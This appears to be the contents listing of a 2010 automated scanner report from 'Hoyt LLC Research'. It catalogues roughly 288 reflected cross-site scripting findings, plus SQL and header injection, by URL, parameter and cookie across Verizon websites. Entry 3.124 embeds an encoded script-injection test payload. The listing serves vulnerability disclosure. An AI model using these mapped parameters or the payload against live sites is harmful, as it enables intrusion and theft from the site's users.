Report generated by XSS.CX at Fri Nov 19 21:15:35 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

Loading

1. SQL injection

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. https://auth.verizon.com/amserver/UI/Login [goto parameter]

3.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

3.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

3.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

3.5. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]

3.6. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]

3.7. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]

3.8. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]

3.9. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]

3.10. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]

3.11. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]

3.12. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]

3.13. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]

3.14. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]

3.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]

3.16. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]

3.17. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]

3.18. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]

3.19. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]

3.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]

3.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]

3.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]

3.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]

3.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]

3.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]

3.26. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]

3.27. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]

3.28. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]

3.29. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]

3.30. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]

3.31. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]

3.32. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]

3.33. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]

3.34. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]

3.35. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]

3.36. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]

3.37. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]

3.38. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]

3.39. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]

3.40. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]

3.41. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]

3.42. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]

3.43. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]

3.44. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]

3.45. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 4]

3.46. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 5]

3.47. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

3.48. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

3.49. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [audio_conf parameter]

3.50. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [bbaw parameter]

3.51. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [connex parameter]

3.52. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiostvown parameter]

3.53. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiosvoice parameter]

3.54. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [msp parameter]

3.55. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]

3.56. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [npa parameter]

3.57. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [nxx parameter]

3.58. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [online_backup parameter]

3.59. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [partner parameter]

3.60. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcity parameter]

3.61. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcounty parameter]

3.62. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popdma parameter]

3.63. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popindicator parameter]

3.64. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popip parameter]

3.65. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popservice parameter]

3.66. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popstate parameter]

3.67. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popzipcode parameter]

3.68. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [prizm parameter]

3.69. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pts parameter]

3.70. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pws parameter]

3.71. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [search parameter]

3.72. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [sec_email parameter]

3.73. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_enh_msg parameter]

3.74. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_premmail parameter]

3.75. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [usertype parameter]

3.76. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vasonly parameter]

3.77. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodfamily parameter]

3.78. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodunlim parameter]

3.79. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [viss parameter]

3.80. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webex parameter]

3.81. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webhosting parameter]

3.82. http://syndicate.verizon.net/ads/js.ashx [page parameter]

3.83. http://syndicate.verizon.net/ads/js.ashx [pos parameter]

3.84. http://wapp.verizon.net/bookmarks/bmredirex.asp [WT.ti parameter]

3.85. http://wapp.verizon.net/bookmarks/bmredirex.asp [channel parameter]

3.86. http://wapp.verizon.net/bookmarks/bmredirex.asp [clientid parameter]

3.87. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]

3.88. http://wapp.verizon.net/bookmarks/bmredirex.asp [q parameter]

3.89. http://wapp.verizon.net/bookmarks/bmredirex.asp [web_search_type parameter]

3.90. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [WT.ti parameter]

3.91. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [channel parameter]

3.92. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [clientid parameter]

3.93. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]

3.94. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [q parameter]

3.95. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [web_search_type parameter]

3.96. http://www.verizon.net/central/bookmark [WT.ti parameter]

3.97. http://www.verizon.net/central/bookmark [channel parameter]

3.98. http://www.verizon.net/central/bookmark [clientid parameter]

3.99. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]

3.100. http://www.verizon.net/central/bookmark [q parameter]

3.101. http://www.verizon.net/central/bookmark [web_search_type parameter]

3.102. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]

3.103. http://www.verizonwireless.com/b2c/store/controller [action parameter]

3.104. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]

3.105. http://www.verizonwireless.com/b2c/store/controller [item parameter]

3.106. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]

3.107. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]

3.108. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

3.109. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

3.110. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

3.111. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]

3.112. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

3.113. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

3.114. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]

3.115. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

3.116. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]

3.117. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]

3.118. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]

3.119. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]

3.120. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]

3.121. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]

3.122. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]

3.123. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

3.124. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

3.125. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

3.126. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]

3.127. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]

3.128. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]

3.129. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]

3.130. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]

3.131. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]

3.132. https://www22.verizon.com/myverizon/ [goto parameter]

3.133. https://www22.verizon.com/myverizon/ [goto parameter]

3.134. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]

3.135. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]

3.136. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

3.137. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

3.138. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

3.139. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

3.140. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

3.141. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]

3.142. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]

3.143. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]

3.144. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

3.145. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

3.146. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]

3.147. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]

3.148. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]

3.149. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]

3.150. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]

3.151. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

3.152. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

3.153. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

3.154. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

3.155. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

3.156. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

3.157. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

3.158. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

3.159. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

3.160. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

3.161. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

3.162. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

3.163. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

3.164. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

3.165. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

3.166. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

3.167. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

3.168. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

3.169. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

3.170. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

3.171. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

3.172. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

3.173. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

3.174. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

3.175. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

3.176. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

3.177. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

3.178. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

3.179. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

3.180. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

3.181. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

3.182. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

3.183. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

3.184. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

3.185. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

3.186. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]

3.187. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

3.188. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

3.189. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

3.190. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

3.191. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

3.192. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

3.193. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

3.194. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

3.195. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

3.196. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

3.197. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

3.198. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

3.199. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

3.200. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

3.201. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

3.202. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

3.203. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

3.204. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

3.205. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

3.206. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

3.207. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

3.208. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

3.209. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

3.210. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

3.211. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

3.212. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

3.213. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

3.214. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

3.215. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

3.216. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

3.217. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

3.218. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

3.219. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

3.220. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

3.221. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

3.222. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

3.223. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

3.224. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

3.225. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

3.226. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

3.227. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

3.228. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

3.229. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

3.230. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

3.231. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

3.232. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

3.233. http://www22.verizon.com/Residential/Services/ [vzapps cookie]

3.234. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]

3.235. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]

3.236. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]

3.237. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

3.238. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

3.239. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

3.240. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

3.241. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

3.242. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

3.243. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

3.244. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

3.245. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

3.246. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

3.247. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

3.248. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

3.249. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

3.250. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

3.251. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

3.252. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

3.253. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

3.254. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

3.255. http://www22.verizon.com/residential/internet [vzapps cookie]

3.256. http://www22.verizon.com/residential/internet [vzapps cookie]

3.257. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]

3.258. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]

3.259. http://www22.verizon.com/residentialhelp [vzapps cookie]

3.260. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

3.261. http://www22.verizon.com/residentialhelp/ [vzapps cookie]

3.262. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

3.263. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

3.264. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]

3.265. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

3.266. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

3.267. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]

3.268. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

3.269. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

3.270. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

3.271. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]

3.272. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

3.273. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

3.274. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]

3.275. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

3.276. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

3.277. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

3.278. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

3.279. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

3.280. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]

3.281. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]

3.282. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

3.283. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

3.284. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]

3.285. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

3.286. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

3.287. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]

3.288. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

